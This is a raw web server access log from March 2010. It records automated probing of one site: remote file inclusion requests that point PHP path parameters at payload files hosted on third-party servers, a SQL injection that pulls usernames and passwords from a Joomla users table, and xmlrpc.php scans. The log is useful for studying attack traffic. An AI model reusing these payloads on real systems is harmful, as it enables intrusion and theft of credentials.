75.119.216.146 - - [03/Mar/2010:11:06:58 -0800] "GET /logs//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:11:06:58 -0800] "GET /?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:11:07:08 -0800] "GET /logs/access_100203.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:08:20 -0800] "GET /logs//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:08:20 -0800] "GET /gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:08:20 -0800] "GET /logs/access_100129.log//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:08:25 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:11:08:50 -0800] "GET /?sourcedir=http://www.petrus.com.ua/cgi-bin/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:11:09:08 -0800] "GET /logs/access_100128.log//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:11:09:38 -0800] "GET /logs/access_100219.log//?sourcedir=http://www.petrus.com.ua/cgi-bin/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:09:44 -0800] "GET /logs/access_100225.log//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:09:44 -0800] "GET /?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:09:44 -0800] "GET /logs//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:10:52 -0800] "GET /logs/access_100225.log%20%20//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:10:52 -0800] "GET /logs//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:10:52 -0800] "GET /?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:11:39 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:11:39 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:11:39 -0800] "GET /logs/access_100131.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:11:48 -0800] "GET /admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:11:48 -0800] "GET /logs/access_100207.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:11:48 -0800] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:11:12:21 -0800] "GET /logs/access_100209.log//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:11:12:21 -0800] "GET /logs//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:11:12:21 -0800] "GET /delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:12:57 -0800] "GET /?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:13:23 -0800] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:13:23 -0800] "GET /admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:13:24 -0800] "GET /logs/access_100207.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:11:13:25 -0800] "GET /modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:11:13:25 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:13:56 -0800] "GET /logs/access_100128.log//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:15:08 -0800] "GET /logs/access_100210.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:15:19 -0800] "GET /logs/access_100128.log//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:15:29 -0800] "GET /module///bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
213.251.189.201 - - [03/Mar/2010:11:15:29 -0800] "GET //bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
213.251.189.201 - - [03/Mar/2010:11:15:30 -0800] "GET /module/setup.php///bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
85.233.162.101 - - [03/Mar/2010:11:16:14 -0800] "GET /logs/access_100204.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:16:14 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:16:14 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:16:48 -0800] "GET //bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
213.251.189.201 - - [03/Mar/2010:11:16:48 -0800] "GET /module///bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
85.233.162.101 - - [03/Mar/2010:11:16:58 -0800] "GET /logs/access_100126.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:17:24 -0800] "GET /logs/access_100220.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:17:24 -0800] "GET /xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:17:24 -0800] "GET /logs/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:17:55 -0800] "GET /logs/access_100217.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:18:05 -0800] "GET /logs/access_100215.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:18:05 -0800] "GET /logs/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:18:26 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:18:29 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.212.39.146 - - [03/Mar/2010:11:18:52 -0800] "GET /login.php?dir=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/* HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
202.212.39.146 - - [03/Mar/2010:11:18:53 -0800] "GET /logs//login.php?dir=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/* HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:19:14 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:19:14 -0800] "GET /logs/access_100226.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:19:15 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:19:31 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:19:31 -0800] "GET /logs/access_100226.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:19:31 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:19:35 -0800] "GET /logs/access_100224.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:19:35 -0800] "GET /xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:11:19:35 -0800] "GET /logs/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
219.94.193.152 - - [03/Mar/2010:11:20:39 -0800] "GET /logs/access_100214.log%20%20/htmltonuke.php?filnavn=http://zerozon.co.kr/data/eeng/heheh.txt????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:11:21:06 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:21:13 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:21:13 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:21:13 -0800] "GET /modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:21:39 -0800] "GET /logs/access_100129.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:21:44 -0800] "GET /logs/access_100129.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [03/Mar/2010:11:21:48 -0800] "GET /htmltonuke.php?filnavn=http://zerozon.co.kr/data/eeng/heheh.txt????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [03/Mar/2010:11:22:07 -0800] "GET /logs/htmltonuke.php?filnavn=http://zerozon.co.kr/data/eeng/heheh.txt????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:22:39 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:22:39 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:22:39 -0800] "GET /logs/access_100225.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:22:54 -0800] "GET /logs/access_100219.log//admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:22:54 -0800] "GET /admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:22:54 -0800] "GET /logs//admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:23:38 -0800] "GET /logs/access_100225.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:23:41 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:23:46 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:23:53 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:23:53 -0800] "GET /logs/access_100226.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:23:53 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.212.39.146 - - [03/Mar/2010:11:25:44 -0800] "GET /logs/access_100215.log//login.php?dir=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/* HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:25:54 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:25:54 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:25:54 -0800] "GET /logs/access_100226.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:25:55 -0800] "GET /logs/access_100129.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:26:40 -0800] "GET /logs/access_100220.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:27:18 -0800] "GET /logs/access_100220.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:27:40 -0800] "GET /logs/access_100207.log//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:11:27:48 -0800] "GET /logs/access_100129.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:28:46 -0800] "GET /logs/access_100210.log//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:11:29:15 -0800] "GET /board/bbs/write_update.php?board_skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:29:30 -0800] "GET /logs/access_100207.log//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:29:39 -0800] "GET /admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:29:39 -0800] "GET /logs/access_100207.log//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:29:39 -0800] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:29:57 -0800] "GET /logs/access_100210.log//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:11:30:21 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:11:30:21 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:11:30:22 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:30:50 -0800] "GET /logs/access_100210.log//admin.remository.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:11:31:10 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:32:24 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:32:28 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:32:28 -0800] "GET /////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:32:28 -0800] "GET /logs/access_100128.log//////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:33:26 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:33:37 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:33:37 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:33:38 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:33:48 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:33:48 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:33:48 -0800] "GET /logs/access_100226.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:33:50 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:33:51 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:33:54 -0800] "GET /logs/access_100226.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:11:34:18 -0800] "GET /logs/access_100201.log//////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:35:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:35:06 -0800] "GET /logs/access_100205.log//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
